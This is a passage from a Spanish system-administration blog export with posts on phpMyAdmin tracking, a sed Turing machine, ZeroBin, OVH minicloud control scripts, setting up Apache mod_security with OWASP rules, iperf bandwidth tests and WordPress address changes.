seguimiento de las consultas SQL ejecutadas por phpMyAdmin, tanto sentencias de definición como de manipulación de datos, pudiendo guardar versiones de las tablas.\nAl guardar la versión de una tabla, phpMyAdmin guarda una captura de la misma, incluyendo su estructura e índices. Posteriormente, phpMyAdmin guardará todas las órdenes que cambien la estructura de la tabla o los datos contenidos en ella, y asociará dichas órdenes con el número de versión. Se podrán visualizar estos cambios en la pestaña de Seguimiento.\nPara permitir esta funcionalidad necesitamos:\nconfigurar pmadb y el almacenamiento de configuración en phpMyAdmin definir el nombre de la tabla en $cfg['Servers'][$i]['tracking'] Gracias a este almacenamiento de configuración se puede disfrutar de un gran variedad de funcionalidades tales como marcadores, comentarios, histórico de SQL, mecanismo de seguimiento, generación de PDFs, transformación de los campos de contenido, etc.\nAlmacenamiento de configuración El primero paso será crear las tablas especiales necesarias. En el fichero /usr/share/doc/phpmyadmin/examples/create_tables.sql.gz tenemos un ejemplo de lo necesario. Posiblemente, ya tengamos creadas algunas de las tablas que ahí aparecen, si lanzamos el script sólo nos creará las que no existan:\n$ cp /usr/share/doc/phpmyadmin/examples/create_tables.sql.gz . $ gunzip create_tables.sql.gz $ mysql -uroot -p \u0026lt; create_tables.sql Si necesitásemos recuperar la contraseña de MySQL o tuviéramos problemas importando los datos podemos echarle un ojo a estos enlaces.\nEn particular, lo que nos interesa es lo referente a la tabla pma_tracking, y esto es lo que ejecuta el script anterior:\n-- -- Table structure for table `pma_tracking` -- CREATE TABLE IF NOT EXISTS `pma_tracking` ( `db_name` varchar(64) collate utf8_bin NOT NULL, `table_name` varchar(64) collate utf8_bin NOT NULL, `version` int(10) unsigned NOT NULL, `date_created` datetime NOT NULL, `date_updated` datetime NOT NULL, `schema_snapshot` text collate utf8_bin NOT NULL, `schema_sql` text collate utf8_bin, `data_sql` text collate utf8_bin, `tracking` set(\u0026#39;UPDATE\u0026#39;,\u0026#39;REPLACE\u0026#39;,\u0026#39;INSERT\u0026#39;,\u0026#39;DELETE\u0026#39;,\u0026#39;TRUNCATE\u0026#39;,\u0026#39;CREATE DATABASE\u0026#39;,\u0026#39;ALTER DATABASE\u0026#39;,\u0026#39;DROP DATABASE\u0026#39;,\u0026#39;CREATE TABLE\u0026#39;,\u0026#39;ALTER TABLE\u0026#39;,\u0026#39;RENAME TABLE\u0026#39;,\u0026#39;DROP TABLE\u0026#39;,\u0026#39;CREATE INDEX\u0026#39;,\u0026#39;DROP INDEX\u0026#39;,\u0026#39;CREATE VIEW\u0026#39;,\u0026#39;ALTER VIEW\u0026#39;,\u0026#39;DROP VIEW\u0026#39;) collate utf8_bin default NULL, `tracking_active` int(1) unsigned NOT NULL default \u0026#39;1\u0026#39;, PRIMARY KEY (`db_name`,`table_name`,`version`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin ROW_FORMAT=COMPACT; Configurar phpMyAdmin Ahora que ya hemos creado las tablas necesarias, deberemos configurar los parámetros que necesita phpMyAdmin. En Ubuntu, editamos el archivo /etc/phpmyadmin/config.inc.php, y nos aseguramos de que aparecen las siguientes líneas:\n/_ Optional: User for advanced features _/ $cfg[\u0026#39;Servers\u0026#39;][$i][\u0026#39;controluser\u0026#39;] = $dbuser; $cfg[\u0026#39;Servers\u0026#39;][$i][\u0026#39;controlpass\u0026#39;] = $dbpass; /_ Optional: Advanced phpMyAdmin features _/ $cfg[\u0026#39;Servers\u0026#39;][$i][\u0026#39;pmadb\u0026#39;] = $dbname; $cfg[\u0026#39;Servers\u0026#39;][$i][\u0026#39;bookmarktable\u0026#39;] = \u0026#39;pma_bookmark\u0026#39;; $cfg[\u0026#39;Servers\u0026#39;][$i][\u0026#39;relation\u0026#39;] = \u0026#39;pma_relation\u0026#39;; $cfg[\u0026#39;Servers\u0026#39;][$i][\u0026#39;table_info\u0026#39;] = \u0026#39;pma_table_info\u0026#39;; $cfg[\u0026#39;Servers\u0026#39;][$i][\u0026#39;table_coords\u0026#39;] = \u0026#39;pma_table_coords\u0026#39;; $cfg[\u0026#39;Servers\u0026#39;][$i][\u0026#39;pdf_pages\u0026#39;] = \u0026#39;pma_pdf_pages\u0026#39;; $cfg[\u0026#39;Servers\u0026#39;][$i][\u0026#39;column_info\u0026#39;] = \u0026#39;pma_column_info\u0026#39;; $cfg[\u0026#39;Servers\u0026#39;][$i][\u0026#39;history\u0026#39;] = \u0026#39;pma_history\u0026#39;; $cfg[\u0026#39;Servers\u0026#39;][$i][\u0026#39;designer_coords\u0026#39;] = \u0026#39;pma_designer_coords\u0026#39;; Los valores de controluser, controlpass y pmadb se toman del archivo /etc/phpmyadmin/config-db.php.\nA continuación de las líneas anteriores, añadimos:\n/_ Optional: Tracking features _/ $cfg[\u0026#39;Servers\u0026#39;][$i][\u0026#39;tracking\u0026#39;] = \u0026#39;pma_tracking\u0026#39;; $cfg[\u0026#39;Servers\u0026#39;][$i][\u0026#39;tracking_default_statements\u0026#39;] = \u0026#39;CREATE TABLE,ALTER TABLE,DROP TABLE,RENAME TABLE,CREATE INDEX,DROP INDEX,INSERT,UPDATE,DELETE,TRUNCATE,REPLACE,CREATE VIEW,ALTER VIEW,DROP VIEW,CREATE DATABASE,ALTER DATABASE,DROP DATABASE\u0026#39;; $cfg[\u0026#39;Servers\u0026#39;][$i][\u0026#39;tracking_version_auto_create\u0026#39;] = TRUE; $cfg[\u0026#39;Servers\u0026#39;][$i][\u0026#39;tracking_version_drop_view\u0026#39;] = TRUE; $cfg[\u0026#39;Servers\u0026#39;][$i][\u0026#39;tracking_version_drop_table\u0026#39;] = TRUE; $cfg[\u0026#39;Servers\u0026#39;][$i][\u0026#39;tracking_version_drop_database\u0026#39;] = TRUE; Y ya está. No es necesario reiniciar el servidor, pero es posible que necesitemos borrar las cookies del navegador para que no volvamos a ver el mensaje del principio, por ejemplo, cerrando la sesión en phpMyAdmin y volviendo a entrar, o recargando la caché del navegador mediante Ctrl+Shift+r.\nReferencias » phpMyAdmin doc: almacenamiento de configuración para phpMyAdmin » phpMyAdmin doc: pmadb » phpMyAdmin doc: tracking\n","permalink":"http://karpoke.ignaciocano.com/2012/05/10/opciones-adicionales-para-trabajar-con-tablas-vinculadas-en-phpmyadmin/","summary":"\u003cp\u003e\u003cimg alt=\"PhpMyAdmin Logo\" loading=\"lazy\" src=\"/images/PhpMyAdmin-Logo-300x212.png\"\u003e\u003c/p\u003e\n\u003cp\u003ePuede que alguna vez hayamos visto este mensaje en el panel de\nadministración de phpMyAdmin:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eLas opciones adicionales para trabajar con tablas vinculadas fueron\ndesactivadas. Para saber porqué, dé clic \u003ca href=\"http://www.phpmyadmin.net/localized_docs/es/Documentation.html#tracking\"\u003eaquí\u003c/a\u003e.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eSi seguimos el enlace, nos lleva a la documentación donde nos explican\nque, a partir de la versión 3.3.x, está disponible el sistema de\n\u003cem\u003etracking\u003c/em\u003e, que es un sistema que permite realizar un seguimiento de las\nconsultas SQL ejecutadas por phpMyAdmin, tanto sentencias de definición\ncomo de manipulación de datos, pudiendo guardar versiones de las tablas.\u003c/p\u003e","title":"Opciones adicionales para trabajar con tablas vinculadas en phpMyAdmin"},{"content":"¿Cómo puede ser un editor de flujo, una utilidad para el tratamiento de texto, un lenguaje Turing completo? sed permite saltos condiciones e incondicionales y utiliza un buffer temporal, lo que permite construir una máquina de Turing con él, y cualquier lenguaje que pueda construir una máquina de Turing es Turing completo.\nUna implementación de una máquina de Turing con sed es turing.sed.\nUn ejemplo de programa que realiza el incremento de un número binario es el siguiente:\n| 10010111 # State 0 0 R0 011R1 000R1 # State 1 1 L2 100R1 111R1 # State 2 2 1R3 201R3 210L2 # State 3 3 RF 300R3 311R3 En la primera línea se muestra el contenido de la cinta a la derecha del cursor, marcado por una barra vertical.\nLas siguientes líneas del programa son las reglas que definen lo que debe hacer la máquina de Turing, y tienen la siguiente sintaxis:\nestado_actual símbolo_actual nuevo_símbolo dirección nuevo_estado Para ejecutar el programa:\n$ sed -f turing.sed \u0026lt; increment.tm (0) | |10010111 (0) |1|0010111 (1) 1|0|010111 (1) 10|0|10111 (1) 100|1|0111 (1) 1001|0|111 (1) 10010|1|11 (1) 100101|1|1 (1) 1001011|1| (1) 10010111| | (2) 1001011|1| (2) 100101|1|0 (2) 10010|1|00 (2) 1001|0|000 (3) 10011|0|00 (3) 100110|0|0 (3) 1001100|0| (3) 10011000| | (F) 10011000 | | Final state F reached... end of processing La salida muestra el estado en el que está la máquina, el contenido de la cinta y la posición del cursor entre dos barras verticales.\nEl siguiente programa concatena dos cadenas de unos:\n# concatenate two strings of 1\u0026#39;s | 11011 # State 0 0 R0 000R0 01 R1 # State 1 111R1 100R2 # State 2 200R2 211R3 # State 3 3 1L4 301L4 311R3 # State 4 411L4 400L5 # State 5 5 R7 500L5 511L6 # State 6 6 R0 600R0 611L6 # State 7 700R7 711R8 # state 8 811R8 8 RF 800RF Otros ejemplos:\n» Tetris » Sokoban (juego » Calculator\nReferencias » A proof that Unix utility \u0026ldquo;sed\u0026rdquo; is Turing complete » Implementation of a Turing Machine as Sed Script » Turing machine simulator\n","permalink":"http://karpoke.ignaciocano.com/2012/04/22/sed-es-turing-completo/","summary":"\u003cp\u003e¿Cómo puede ser un editor de flujo, una utilidad para el tratamiento de\ntexto, un lenguaje Turing completo? \u003ccode\u003esed\u003c/code\u003e permite saltos condiciones e\nincondicionales y utiliza un \u003cem\u003ebuffer\u003c/em\u003e temporal, lo que permite\n\u003ca href=\"http://www.catonmat.net/blog/proof-that-sed-is-turing-complete/\"\u003econstruir una máquina de Turing con él\u003c/a\u003e, y cualquier lenguaje que\npueda construir una máquina de Turing es Turing completo.\u003c/p\u003e\n\u003cp\u003eUna implementación de una máquina de Turing con \u003ccode\u003esed\u003c/code\u003e es \u003ca href=\"http://www.catonmat.net/ftp/sed/turing.sed\"\u003eturing.sed\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eUn ejemplo de programa que realiza el incremento de un número binario es\nel siguiente:\u003c/p\u003e","title":"sed es Turing completo"},{"content":"ZeroBin es una aplicación web de código abierto que permite subir textos, al estilo pastebin.com, pero cifrados, de tal manera que nadie que no conozca la clave puede tener acceso, ni siquiera el servidor. Los datos se cifran y descifran en el navegador usando una clave AES de 256 bits, utilizando la librería de cifrado y descifrado en JavaScript de la universidad de Standford.\nEs rápido, fácil de utilizar y no necesita una base de datos, tan solo un servidor de páginas PHP (5.2.6+) y un navegador moderno con soporte JavaScript habilitado. Permite configurar que el contenido expire en un tiempo determinado o comenzar una conversación entorno a él, entre algunas de sus características, y otras que vendrán en futuras versiones.\nInstalación Cabe recordar que es una versión alpha, susceptible de contener fallos.\nPara instalar la aplicación, sólo tenemos que descargar el archivo y descomprimirlo en un directorio accesible por nuestro servidor web:\n$ mkdir zerobin $ cd zerobin $ wget http://sebsauvage.net/files/zerobin_0.15_alpha.zip $ unzip zerobin_0.15_alpha.zip Le asignamos el propietario y los permisos necesarios. Por ejemplo:\n$ sudo chown -R www-data:www-data zerobin Un ejemplo de uso lo tenemos en anonpaste.tk/.\nReferencias » ZeroBin » Stanford Javascript Crypto Library\n","permalink":"http://karpoke.ignaciocano.com/2012/04/21/zerobin/","summary":"\u003cp\u003eZeroBin es una aplicación web de código abierto que permite subir\ntextos, al estilo \u003ca href=\"http://pastebin.com/\"\u003epastebin.com\u003c/a\u003e, pero cifrados, de tal manera que\nnadie que no conozca la clave puede tener acceso, ni siquiera el\nservidor. Los datos se cifran y descifran en el navegador usando una\nclave AES de 256 bits, utilizando la \u003ca href=\"http://crypto.stanford.edu/sjcl/\"\u003elibrería de cifrado y descifrado\nen JavaScript\u003c/a\u003e de la universidad de Standford.\u003c/p\u003e\n\u003cp\u003eEs rápido, fácil de utilizar y no necesita una base de datos, tan solo\nun servidor de páginas PHP (5.2.6+) y un navegador moderno con soporte\nJavaScript habilitado. Permite configurar que el contenido expire en un\ntiempo determinado o comenzar una conversación entorno a él, entre\nalgunas de sus características, y otras que vendrán en futuras\nversiones.\u003c/p\u003e","title":"ZeroBin"},{"content":"Si tenemos un minicloud con OVH, podemos gestionar las instancias (máquinas vituales) con un script creado por Dominique Gallot. El script utiliza la API SOAP de OVH, de tal manera que permite obtener información sobre las instancias, arrancarlas y pararlas desde el terminal, sin tener que hacerlo desde el panel de administración.\nEn la página de OVH tienen el script ovhclud, para gestionar la nube (Public Cloud), pero parece que todavía no soporta las instancias de minicloud.\nInstalación Para descargar el script de la página de Gallot:\n$ wget -q http://svn.gallot.be/blog/ovh-cloud-api/ovh.pm $ wget -q http://svn.gallot.be/blog/ovh-cloud-api/ovh.pl $ chmod a+x ovh.pl El script utiliza la librería libsoap-lite-perl, por lo que deberá estar instalada en el sistema.\nAcciones Para obtener un listado de los servicios que tenemos:\n$ ./ovh.pl -u ab12345-ovh -p mypassword -a listservice Services name : ab12345-cloud0 title : Cloud zone : ab1c2.project.ovh.net Para listar las instancias:\n$ ./ovh.pl -u ab12345-ovh -p mypassword -q -a listvm cloud1 12345 running 211.58.125.116 Para listar una instancia concreta:\n$ ./ovh.pl -u ab12345-ovh -p mypassword -q -a listvm -s cloud1 cloud1 12345 running 211.58.125.116 En este caso, hay una instancia encendida. Si queremos pararla sólo tenemos que especifica el nombre de la misma:\n$ ./ovh.pl -u ab12345-ovh -p mypassword -a stopvm -m cloud1 Podemos comprobar que está parada:\n$ ./ovh.pl -u ab12345-ovh -p mypassword -a listvm name : cloud1 id : 12345 state : stopped ip : ipDns : Para arrancar la instancia también debemos especificar el nombre:\n$ ./ovh.pl -u ab12345-ovh -p mypassword -a startvm -m cloud1 Si acto seguido comprobamos la instancia, vemos que ya tiene asignada una IP (distinta a la anterior), aunque está marcada como stopped:\n$ ./ovh.pl -u ab12345-ovh -p mypassword -a listvm name : cloud1 id : 12345 state : stopped ip : 136.125.58.211 ipDns : mc-136-125-58-211.ovh.net Transcurrido el tiempo que la instancia tarda en arrancar, ya queda marcada como encendida:\n$ ./ovh.pl -u ab12345-ovh -p mypassword -a listvm name : cloud1 id : 12345 state : running ip : 136.125.58.211 ipDns : mc-136-125-58-211.ovh.net También podemos reiniciarla:\n$ ./ovh.pl -u ab12345-ovh -p mypassword -a rebootvm Si queremos seguir el intercambios de mensajes SOAP podemos añadir el argumento -t.\nParar una instancia proporcionando su URL o su IP Teniendo esto en cuenta, el siguiente script stop-cloud-url.sh detiene la instancia dada su URL:\n#!/bin/bash - USERNAME=ab12345-ovh PASSWORD=mypassword DOMAIN=\u0026#34;$1\u0026#34; IP=$(host \u0026#34;$DOMAIN\u0026#34; | awk \u0026#39;{print $NF}\u0026#39;) VMNAME=$(ovh.pl -u $USERNAME -p $PASSWORD -q -a listvm | grep $IP | awk \u0026#39;{print $1}\u0026#39;) ovh.pl -u $USERNAME -p $PASSWORD -a stopvm -m $VMNAME Si, en lugar de un dominio, tenemos su IP, podemos detener la instancia usando el script stop-cloud-ip.sh:\n#!/bin/bash - USERNAME=ab12345-ovh PASSWORD=mypassword IP=\u0026#34;$1\u0026#34; VMNAME=$(ovh.pl -u $USERNAME -p $PASSWORD -q -a listvm | grep $IP | awk \u0026#39;{print $1}\u0026#39;) ovh.pl -u $USERNAME -p $PASSWORD -a stopvm -m $VMNAME Can’t locate ovh.pm in @INC El script ovh.pl hace uso del paquete ovh.pm. Si no ejecutamos ovh.pl desde el mismo directorio en el que está ovh.pm se quejará de que no lo encuentra. Para solucionarlo, podemos copiar el paquete a una ruta incluido en el @INC (más o menos como el CLASSPATH de Java o el PYTHONPATH de Python):\n$ perl -e \u0026#39;print \u0026#34;@INC\u0026#34;;\u0026#39; /etc/perl /usr/local/lib/perl/5.12.4 /usr/local/share/perl/5.12.4 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.12 /usr/share/perl/5.12 /usr/local/lib/site_perl . También podemos incluir la siguiente directiva, en ovh.pl, para que incluya el directorio donde se encuentra ovh.pm:\nuse lib \u0026#39;/home/myuser/modules\u0026#39;; Programar el encendido o apagado de una instancia Programar el encendido o apagado de la instancia se vuelve muy sencillo.\nSi queremos programar un encendido o apagado a una hora concreta, o dentro de un tiempo determinado:\n$ at 08:00 $ at midnight $ at noon $ at now $ at now + 5 minutes $ at midnight + 2 weeks Después, introducimos la ruta del script y terminamos con ^D (control+D).\nSi queremos que sea algo periódico, por ejemplo, de lunes a viernes de 7am a 5pm, utilizaremos el cron:\n$ crontab -e # m h d mon dow(0=sunday) 0 7 * * 1-5 /path/to/start-cloud.sh 0 17 * * 1-5 /path/to/stop-cloud-url.sh sub.domain.com ","permalink":"http://karpoke.ignaciocano.com/2012/04/20/arrancar-y-parar-instancias-minicloud-de-ovh-desde-el-terminal/","summary":"\u003cp\u003eSi tenemos un \u003cem\u003eminicloud\u003c/em\u003e con OVH, podemos gestionar las instancias\n(máquinas vituales) con un \u003cem\u003escript\u003c/em\u003e creado por \u003ca href=\"http://www.gallot.be/?p=124\"\u003eDominique Gallot\u003c/a\u003e. El\n\u003cem\u003escript\u003c/em\u003e utiliza la \u003ca href=\"http://www.ovh.com/soapi/es/\"\u003eAPI SOAP de OVH\u003c/a\u003e, de tal manera que permite\nobtener información sobre las instancias, arrancarlas y pararlas desde\nel terminal, sin tener que hacerlo desde el panel de administración.\u003c/p\u003e\n\u003cp\u003eEn la página de OVH tienen el \u003cem\u003escript\u003c/em\u003e\n\u003ca href=\"http://www.ovh.com/fr/cloud/api/ovhcloud\"\u003e\u003ccode\u003eovhclud\u003c/code\u003e, para gestionar la nube (Public Cloud)\u003c/a\u003e,\npero parece que todavía no soporta las instancias de \u003cem\u003eminicloud\u003c/em\u003e.\u003c/p\u003e","title":"Arrancar y parar instancias minicloud de OVH desde el terminal"},{"content":"mod_security es un módulo de Apache que actua como cortafuegos, protegiendo contra diversos tipos de ataque, y permitiendo monitorizar el tráfico HTTP en tiempo real.\nPor sí solo, el módulo no provee la protección, sino que deben añadirse reglas. Afortunadamente, existen conjuntos de reglas predefinidos, como el OWASP ModSecurity Core Rule Set Project, que nos facilitan la tarea. Al contrario que los sistemas de detección de intrusos, basados en firmas de vulnerabilidades conocidas, este conjunto de reglas protege contra vulnerabilidades desconocidas que pueda haber en las aplicaciones web.\nInstalación de mod_security Podemos descargarnos el código desde su web, desde su repositorio de versiones o desde el repositorio de paquetes de la distribución. Para descargarlo desde el repositorio de Ubuntu:\n$ sudo aptitude install libxml2 libxml2-dev libxml2-utils libaprutil1 libaprutil1-dev $ sudo aptitude install libapache-mod-security La versión que se instala es la 2.5.11-1. Aunque la última versión estable en su web es la 2.6.2, esta vez utilizaremos la del repositorio de Ubuntu.\nPara activar el módulo:\n$ sudo a2enmod mod-security Y reiniciamos Apache:\n$ sudo apache2ctl restart Configuración inicial Podemos crear un archivo donde configuremos algunas directivas en /etc/apache2/conf.d/modsecurity.conf. Por ejemplo, donde se encuentra el fichero de log:\nSecAuditLog /var/log/apache2/mod-security.log Reiniciamos Apache para que los cambios tengan efecto:\n$ sudo apache2ctl restart Reglas OWASP Descargamos la última versión de las reglas (2.2.4) y lo descomprimimos en el directorio /etc/apache2. Para evitar problemas, las descargaremos en el directorio /etc/apache2:\n$ cd /etc/apache2 $ sudo wget http://downloads.sourceforge.net/project/mod-security/modsecurity-crs/0-CURRENT/modsecurity-crs_2.2.4.tar.gz $ sudo tar xvzf modsecurity-crs_2.2.4.tar.gz $ sudo chown -R root:root modsecurity-crs_2.2.4 $ sudo mv modsecurity-crs_2.2.4 modsecurity-crs Hay cinco directorios de reglas con diferentes tipos de regla:\nactivated_rules base_rules experimental_rules optional_rules slr_rules Configuración básica Empezaremos con la configuración básica que viene de ejemplo. Copiamos el archivo de configuración:\n$ cd /etc/apache2/modsecurity-crs $ sudo cp modsecurity_crs_10_config.conf.example modsecurity_crs_10_config.conf Para que se tengan en cuenta las reglas, añadiremos al final del fichero /etc/apache2/apache2.conf:\nInclude modsecurity-crs/modsecurity_crs_10_config.conf Include modsecurity-crs/base_rules/*.conf Deberemos reiniciar Apache.\n$ sudo apache2ctl restart Error creating rule: Unknown variable: REQBODY_ERROR Si al reiniciar el Apache nos aparece este error, se debe a que esta versión de las reglas es para mod_security versión 2.6 o superior. Sin embargo, basta renombrar esta variable por su valor anterior en el fichero modsecurity-crs/base_rules/modsecurity_crs_20_protocol_violations.conf, para que se solucione el error:\n$ cd /etc/apache2/modsecurity-crs/base_rules $ sudo sed -i \u0026#39;s/^SecRule REQBODY_ERROR/SecRule REQBODY_PROCESSOR_ERROR/\u0026#39; modsecurity_crs_20_protocol_violations.conf Más reglas Podemos crear una configuración personalizada, utilizando el directorio activated_rules para incluir enlaces simbólicos a las reglas que queremos activar. En el fichero README hay una explicación detallada de cada regla.\nPrimero, modificaremos el archivo /etc/apache2/apache2.conf para que contenga:\nInclude modsecurity-crs/modsecurity_crs_10_config.conf Include modsecurity-crs/activated_rules/*.conf Por ejemplo, para incluir las reglas básicas:\n$ cd /etc/apache2/modsecurity-crs/activated-rules $ for f in $(ls /etc/apache2/modsecurity-crs/base_rules); do sudo ln -s ../base_rules/$f $f done Para incluir las reglas de spam:\n$ cd /etc/apache2/modsecurity-crs/activated_rules $ for f in $(ls /etc/apache2/modsecurity-crs/optional_rules | grep comment_spam); do sudo ln -s ../optional_rules/$f $f done Para incluir todas las reglas opcionales:\n$ cd /etc/apache2/modsecurity-crs/activated_rules $ for f in $(ls /etc/apache2/modsecurity-crs/optional_rules); do sudo ln -s ../optional_rules/$f $f done Reiniciamos Apache:\n$ sudo apache2ctl restart Actualización de las reglas Si ya tenemos las reglas instaladas y queremos comprobar si hay actualizaciones, en el directorio modsecurity-crs/util hay un script que facilita el proceso. Para comprobar si hay reglas nuevas:\n$ ./rules-updater.pl -rhttps://www.modsecurity.org/autoupdate/repository/ -l Could not load GnuPG module - cannot verify ruleset signatures Repository: https://www.modsecurity.org/autoupdate/repository modsecurity-crs { 2.0.0: modsecurity-crs_2.0.0.zip 2.0.1: modsecurity-crs_2.0.1.zip 2.0.2: modsecurity-crs_2.0.2.zip 2.0.3: modsecurity-crs_2.0.3.zip 2.0.4: modsecurity-crs_2.0.4.zip 2.0.5: modsecurity-crs_2.0.5.zip 2.0.6: modsecurity-crs_2.0.6.zip 2.0.7: modsecurity-crs_2.0.7.zip 2.0.8: modsecurity-crs_2.0.8.zip 2.0.9: modsecurity-crs_2.0.9.zip 2.0.10: modsecurity-crs_2.0.10.zip 2.1.0: modsecurity-crs_2.1.0.zip 2.1.1: modsecurity-crs_2.1.1.zip 2.1.2: modsecurity-crs_2.1.2.zip 2.2.0: modsecurity-crs_2.2.0.zip 2.2.1: modsecurity-crs_2.2.1.zip 2.2.2: modsecurity-crs_2.2.2.zip 2.2.3: modsecurity-crs_2.2.3.zip 2.2.4: modsecurity-crs_2.2.4.zip } Para actualizar a la última versión, primero crearemos un directorio donde se van a descargar y después las descargamos:\n$ cd /tmp $ mkdir crs $ ./rules-updater.pl -rhttp://www.modsecurity.org/autoupdate/repository/ -pcrs -Smodsecurity-crs Esto nos descarga el fichero con las últimas reglas, en este caso modsecurity-crs_2.2.4.zip.\nActualización a 2 de junio de 2013 Parece ser que, actualmente, al intentar actualizar las reglas, nos encontremos con un error 404:\n$ sudo ./rules-updater.pl -rhttp://www.modsecurity.org/autoupdate/repository/ -pcrs -Smodsecurity-crs Could not load GnuPG module - cannot verify ruleset signatures Fetching: modsecurity-crs/modsecurity-crs_2.2.5.zip ... Failed to retrieve ruleset modsecurity-crs/modsecurity-crs_2.2.5.zip: 404 Not Found Podemos encontrar el fichero de reglas para la última versión de mod_security, la 2.2.7, en el repostorio en GitHub. Pero si queremos descargar una versión anterior, podemos recurrir al paquete modsecurity-crs en Launchpad.\n$ wget https://launchpad.net/ubuntu/+archive/primary/+files/modsecurity-crs_2.2.5.orig.tar.gz $ md5sum modsecurity-crs_2.2.5.orig.tar.gz aaeaa1124e8efc39eeb064fb47cfc0aa modsecurity-crs_2.2.5.orig.tar.gz $ tar xvzf modsecurity-crs_2.2.5.orig.tar.gz $ sudo cp -R modsecurity-crs_2.2.5 /etc/apache2/ $ sudo rm /etc/apache2/modsecurity-crs $ cd /etc/apache2 $ sudo ln -s modsecurity-crs_2.2.5 modsecurity-crs Después de copiarlo al directorio de apache, deberemos crear un fichero de configuración, por ejemplo a partir del fichero de ejemplo que viene tal como hicimos al instalarlo sólo que ahora tiene un nombre diferente, y reiniciar apache para que los cambios tengan efecto:\n$ cd /etc/apache2/modsecurity-crs $ sudo cp modsecurity_crs_10_setup.conf.example modsecurity_crs_10_setup.conf Si utilizamos la nueva nomenclatura para el fichero, deberemos actualizar el fichero /etc/apache2/apache2.conf:\nInclude modsecurity-crs/modsecurity_crs_10_setup.conf Include modsecurity-crs/base_rules/*.conf Una vez más, deberemos reiniciar Apache.\nCrypt::SSLeay or IO::Socket::SSL not installed Si nos aparece este error, es que nos faltan módulos:\n$ sudo aptitude install libcrypt-ssleay-perl libio-socket-ssl-perl \u0026lt;h2servertokens \u0026lt; h2\u0026gt;\nMediante mod_security se puede cambiar el valor de la cabecera Server.\nLo primero será asegurarnos de que en el fichero /etc/apache2/conf.d/security contiene el valor:\nServerTokens Full Añadimos al fichero /etc/apache2/conf.d/modsecurity.conf:\nSecServerSignature \u0026#34;incognito\u0026#34; Desactivamos y volvemos a activar el módulo, para que se cree el enlace simbólico a nuestro archivo de configuración, y reiniciamos Apache:\n$ sudo a2dismod mod-security $ sudo a2enmod mod-security $ sudo apache2ctl restart Ya podemos comprobar cómo la cabecera Server ha cambiado:\n$ curl -sI localhost/k/ | grep ^Server Server: incognito Referencias » mod_security » mod_security wiki » mod_security on Apache » Howto: Mod_security » OWASP ModSecurity Core Rule Set Project\n","permalink":"http://karpoke.ignaciocano.com/2012/04/12/apache2-y-mod_security-en-ubuntu-lucid-lynx-10-04/","summary":"\u003cp\u003e\u003ccode\u003emod_security\u003c/code\u003e es un módulo de Apache que actua como cortafuegos,\nprotegiendo contra diversos tipos de ataque, y permitiendo monitorizar\nel tráfico HTTP en tiempo real.\u003c/p\u003e\n\u003cp\u003ePor sí solo, el módulo no provee la protección, sino que deben añadirse\nreglas. Afortunadamente, existen conjuntos de reglas predefinidos, como\nel OWASP ModSecurity Core Rule Set Project, que nos facilitan la tarea.\nAl contrario que los sistemas de detección de intrusos, basados en\nfirmas de vulnerabilidades conocidas, este conjunto de reglas protege\ncontra vulnerabilidades desconocidas que pueda haber en las aplicaciones\nweb.\u003c/p\u003e","title":"Apache2 y mod_security en Ubuntu Lucid Lynx 10.04"},{"content":"Mediante iperf podemos medir el ancho de banda de nuestra red. El programa se ejecuta en un equipo en modo servidor y se lanza desde cada equipo desde el que queramos medir el ancho de banda en modo cliente.\nPor ejemplo, para probar el ancho de banda entre:\nun servidor conectado al router por cable con la IP 192.168.50.100 un portátil conectado a la red inalámbrica En el servidor ejecutamos:\n$ iperf -s En el cliente, indicando la IP del servidor:\n$ iperf -c 192.168.50.100 ------------------------------------------------------------ Client connecting to 192.168.50.100, TCP port 5001 TCP window size: 21.0 KByte (default) ------------------------------------------------------------ [ 3] local 192.168.50.100 port 58707 connected with 192.168.50.100 port 5001 [ ID] Interval Transfer Bandwidth [ 3] 0.0-10.1 sec 13.9 MBytes 11.5 Mbits/sec En el servidor también nos aparecerá esta misma información.\nEl cortafuegos Si estamos usando algún tipo de cortafuegos en el equipo que hace de servidor, y nos filtra el tráfico que manda iperf, deberemos habilitar una regla que permita el tráfico en el puerto 5001, el puerto por defecto que utiliza iperf. Por ejemplo, si usamos ufw:\n$ sudo ufw allow 5001 Si queremos permitir sólo el acceso a los clientes de la red:\n$ sudo ufw allow proto tcp from 192.168.50.0/24 to any port 5001 Para borrar la regla:\n$ sudo ufw delete allow proto tcp from 192.168.50.0/24 to any port 5001 Actualizado el 26 de junio de 2012 Interfaz gráfica Jperf es una interfaz gráfica para iperf. Si queremos utilizarla, descargamos la última versión desde su página:\n$ wget http://xjperf.googlecode.com/files/jperf-2.0.2.zip $ sha1sum jperf-2.0.2.zip 835fcaca05aab60adf0f507a8f203693aff5ea97 $ unzip jperf-2.0.2.zip $ cd jperf-2.0.2.zip $ sh jperf.sh Referencias » Verificando el ancho de banda entre tus clientes de la red\n","permalink":"http://karpoke.ignaciocano.com/2012/04/08/medir-el-ancho-de-banda-entre-dos-equipos-de-la-red/","summary":"\u003cp\u003eMediante \u003ccode\u003eiperf\u003c/code\u003e podemos medir el ancho de banda de nuestra red. El\nprograma se ejecuta en un equipo en modo servidor y se lanza desde cada\nequipo desde el que queramos medir el ancho de banda en modo cliente.\u003c/p\u003e\n\u003cp\u003ePor ejemplo, para probar el ancho de banda entre:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eun servidor conectado al \u003cem\u003erouter\u003c/em\u003e por cable con la IP 192.168.50.100\u003c/li\u003e\n\u003cli\u003eun portátil conectado a la red inalámbrica\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eEn el servidor ejecutamos:\u003c/p\u003e","title":"Medir el ancho de banda entre dos equipos de la red"},{"content":"En el panel de administración de WordPress, en Ajustes \u0026gt; Generales, podemos cambiar la dirección del blog o la dirección donde está instalado Wordpress.\nTenemos que tener cuidado si cambiamos la dirección de WordPress, ya que podemos dejar el sitio, y en especial el panel de control, inaccesible. O puede que lo que nos interese sea actualizar el dominio antiguo por el nuevo.\nEn ambas situaciones, si sólo se debe modificar el dominio, sin que se deba cambiar ninguna ruta relativa de acceso al blog, podemos lograr acceso al panel de administración incluyendo el nuevo dominio al archivo /etc/hosts, y desde ahí modificar cualquier variable que necesitemos.\nPero si hemos cambiado la ruta relativa necesitaremos cambiar el valor en la base de datos. Podemos acceder a 